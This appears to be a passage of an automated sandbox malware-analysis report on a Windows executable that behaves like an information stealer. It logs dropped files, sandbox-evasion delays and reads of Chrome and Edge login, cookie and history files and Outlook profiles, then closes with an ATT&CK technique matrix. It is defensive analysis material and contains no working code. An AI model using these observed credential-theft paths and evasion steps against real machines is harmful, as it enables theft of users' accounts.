            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: fedtlderstvles.lnk.0.dr LNK file: ..\foretell\Skrabnsens.bed
            Source: fedtlderstvles.lnk0.0.dr LNK file: ..\..\user\foretell\Skrabnsens.bed
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\banaleres.ini
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation

            Source: Yara match File source: 00000000.00000002.2039834509.00000000053C9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_37F62908 pushfd ; iretd 12_2_37F6290D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F7800 push eax; ret 12_2_3A3F7809
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Local\Temp\nsp8FE4.tmp\System.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Wull157
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\samfundets.Afg
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Brugtbaaden.mir
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Draabning.Non
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Dataopsamler.txt
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Fiskefarsens89.vol
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\banaleres.ini
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\engagerede.hal
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\evoe.kra
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\provostry.txt
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\retrograde.ini
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | API/Special instruction interceptor: Address: 590437B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | API/Special instruction interceptor: Address: 45A437B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Memory allocated: 7660000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Memory allocated: 38090000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Memory allocated: 37EB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp8FE4.tmp\System.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | API coverage: 0.2 %
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe TID: 8296 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe TID: 8296 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_0040264F FindFirstFileA,0_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_0040264F FindFirstFileA,12_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_00405E9C FindFirstFileA,FindClose,12_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
            Source: axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | API call chain: ExitProcess graph end node | graph_0-3734
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | API call chain: ExitProcess graph end node | graph_0-3893
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Process created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Queries volume information: C:\Users\user\Desktop\axN56TZ3PI.exe VolumeInformation
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BBA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match | File source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 11 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 1 System Network Configuration Discovery; 4 File and Directory Discovery; 115 System Information Discovery; Wi-Fi Discovery; Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 1 Web Service; 21 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
